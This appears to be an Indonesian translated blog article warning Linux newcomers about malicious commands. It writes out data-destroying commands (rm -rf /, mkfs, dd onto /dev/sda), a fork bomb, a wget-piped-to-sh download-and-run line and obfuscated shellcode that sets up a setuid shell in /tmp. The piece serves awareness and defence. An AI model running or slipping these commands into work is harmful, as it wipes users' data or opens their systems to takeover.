(Saduran bebas dari EFYTimes News http://efytimes.com/e1/fullnews.asp?edid=116920)
Ada beberapa perintah malicious GNU/Linux yang apabila dieksekusi (mode root) akan berdampak pada sistem GNU/Linux anda.
Perintah-perintah ini terbagi dalam beberapa kategori yang akan penulis uraikan sebagai berikut :
1. Hapus File, Dikrektori, atau File lainnya
Perintah yang terkenal adalah
rm -rf /
artinya anda akan menghapus direktori root (/) beserta seluruh folder/file yang terkait di dalamnya.
rm -rf .
artinya anda akan menghapus folder berawalan . (hidden) beserta seluruh folder/file yang terkait di dalamnya
rm -rf *
artinya anda akan menghapus file/folder yang berkarakter * beserta seluruh folder/file yang terkait di dalamnya
2. Meremove data pada sebuah Perangkat (device)
Apapun yang berhubungan dengan perintah "mkfs" akan berakibat fatal dan membuat filesystem anda menjadi kosong (blank). Beberapa perintahnya adalah :
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation
any_command > /dev/sda
artinya perintah ini digunakan untuk menulis data pada perangkat yang di block. Jika perintah ini dieksekusi, maka akan menyerang file system dan semua data anda akan hilang.
dd if=something of=/dev/sda
3. Forkbomb
Forkbomb merupakan perintah dengan karakter unik. Perintah ini akan menyebabkan sistem anda beku, hang, freeze, dan mengharuskan anda mereset komputer anda karena kemungkinan data corrupt atau sistem operasi anda gagal bekerja normal.
beberapa perintah tersebut adalah :
:(){:|:&};:
fork while fork (pada Perl)
4. Malicious Code in Shell script
Anda misalnya memperoleh sebuah source dari seseorang untuk sebuah shell script. Namun berhati-hatilah jangan sembarangan langsung di eksekusi. Pelajari lebih dalam mengenai shell script tersebut sebelum dieksekusi.
contoh :
wget http://some_place/some_file
sh ./some_file
atau
wget http://some_place/some_file -O- | sh
5. Malicious source code "misteri" untuk di compile dan dieksekusi
Anda misalnya memperoleh sebuah source code untuk di compile, namun berhati-hatilah jika anda belum memahami betul tentang source code tersebut.
contoh :
char esp[]__attribute__((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Perintah di atas sebenarnya berkarakter "rm -rf ~ / &" dengan resiko menyerang direktori home anda dan semua file jika anda bekerja sebagai root.
6. Tarbomb dan Decompression bombs
Hal ini sebenarnya berada di sisi kelalaian user itu sendiri (human error). Misalnya adan diberikan sebuah file tarbal (tar, kompres file) yang berukuran kecil dari sebuah sumber yang Tidak-Dipercaya. Namun, ketika anda mengekstraknya maka file tersebut berukuran sangat besar serta memenuhi sisa ruang harddisk anda. Maka, alangkah baiknya mempelajari dulu sumber yang akan anda gunakan.
Pesan Penulis
Siapa pun pernah menjadi seorang "newbie", jika anda telah mengetahui sejumlah perintah malicious GNU/Linux di atas maka gunakanlah pengetahuan tersebut untuk kebaikan.
Sekian uraian sederhana mengenai perintah malicious GNU/Linux ini penulis paparkan. Semoga bermanfaat dan salam Open Source.